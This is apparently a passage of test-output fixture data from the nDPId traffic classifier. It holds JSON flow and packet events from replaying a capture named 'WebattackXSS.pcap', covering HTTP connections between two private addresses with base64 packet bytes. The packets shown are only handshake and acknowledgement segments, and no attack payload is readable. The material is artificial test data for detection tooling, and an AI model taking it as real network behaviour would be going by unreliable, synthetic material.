-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9348,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":660,"flow_packet_id":1,"flow_last_seen":1499348096595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348096595,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gtxAAD4GQvSsEAABwKgKMoxUAFDl8LS+AAAAAKACchAAEQAAAgQFtAQCCAoBPTZiAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9349,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":660,"flow_packet_id":2,"flow_last_seen":1499348096595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348096595,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjFQs5xqq5fC0v6AScSCtoQAAAgQFtAQCCAoD5wfWAT02YgEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":660,"flow_packet_id":3,"flow_last_seen":1499348096595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348096595,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gt1AAD4GQvusEAABwKgKMoxUAFDl8LS\/LOcaq4AQAOVMqQAAAQEICgE9NmID5wfW"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9369,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348099359,"flow_last_seen":1499348099359,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099359,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35950,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9369,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_packet_id":1,"flow_last_seen":1499348099359,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348099359,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8tSBAAD4GELCsEAABwKgKMoxuAFCNr4w1AAAAAKACchB+DgAAAgQFtAQCCAoBPTkVAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9370,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_packet_id":2,"flow_last_seen":1499348099359,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348099359,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjG7WE+F5ja+MNqAScSC47wAAAgQFtAQCCAoD5wqJAT05FQEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9371,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_packet_id":3,"flow_last_seen":1499348099360,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348099360,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0tSFAAD4GELesEAABwKgKMoxuAFCNr4w21hPheoAQAOVX9wAAAQEICgE9ORUD5wqJ"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347975371,"flow_last_seen":1499347980892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34656,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347975371,"flow_last_seen":1499347980892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34656,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347976658,"flow_last_seen":1499347981892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34670,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347976658,"flow_last_seen":1499347981892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34670,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347979251,"flow_last_seen":1499347984894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34696,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347979251,"flow_last_seen":1499347984894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34696,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347980524,"flow_last_seen":1499347985894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34710,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347980524,"flow_last_seen":1499347985894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34710,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347981782,"flow_last_seen":1499347986894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34724,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347981782,"flow_last_seen":1499347986894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34724,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347983061,"flow_last_seen":1499347988894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34738,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347983061,"flow_last_seen":1499347988894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34738,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347984370,"flow_last_seen":1499347989894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34752,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347984370,"flow_last_seen":1499347989894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34752,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347985686,"flow_last_seen":1499347990895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34766,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347985686,"flow_last_seen":1499347990895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347988233,"flow_last_seen":1499347993896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34792,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347988233,"flow_last_seen":1499347993896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34792,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347989526,"flow_last_seen":1499347994896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34806,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347989526,"flow_last_seen":1499347994896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347992139,"flow_last_seen":1499347997898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34832,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347992139,"flow_last_seen":1499347997898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34832,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347993411,"flow_last_seen":1499347998898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34846,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347993411,"flow_last_seen":1499347998898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34846,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347994680,"flow_last_seen":1499347999898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34860,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347994680,"flow_last_seen":1499347999898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34860,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347997344,"flow_last_seen":1499348002899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34886,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347997344,"flow_last_seen":1499348002899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34886,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347998605,"flow_last_seen":1499348003900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34900,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347998605,"flow_last_seen":1499348003900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34900,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348001148,"flow_last_seen":1499348006901,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34926,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348001148,"flow_last_seen":1499348006901,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34926,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499348002450,"flow_last_seen":1499348071824,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232355,"flow_avg_l4_payload_len":747,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348003742,"flow_last_seen":1499348008904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34954,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348003742,"flow_last_seen":1499348008904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34954,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348006334,"flow_last_seen":1499348011904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34980,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348006334,"flow_last_seen":1499348011904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34980,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
